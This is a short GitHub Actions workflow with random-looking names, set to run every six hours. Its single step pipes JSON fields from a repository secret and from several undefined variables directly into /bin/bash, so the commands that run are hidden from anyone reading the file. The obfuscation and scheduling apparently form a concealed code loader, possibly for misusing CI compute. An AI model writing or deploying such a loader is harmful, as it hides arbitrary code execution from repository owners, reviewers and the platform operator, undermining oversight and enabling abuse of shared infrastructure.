name: jiangjidong3219

on:
  workflow_dispatch:
  schedule:
    - cron: '6 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jiangjidong3219
        env:
          fmzu7: ${{ secrets.fmzu7 }}
        run: |
          echo $fmzu7 | jq -r .rkjid399 | /bin/bash
          echo $igomc44 | jq -r .robdq37 | /bin/bash
          echo $ygg96209 | jq -r .vfqtf98378 | /bin/bash
          echo $txs8 | jq -r .b5 | /bin/bash
          echo $khnh4348 | jq -r .dfhua9527 | /bin/bash
          echo $za75 | jq -r .ga5 | /bin/bash
          echo $h55 | jq -r .f190 | /bin/bash
          echo $sl17918 | jq -r .tdxd01149 | /bin/bash
          echo $r76471 | jq -r .qrvnt24 | /bin/bash

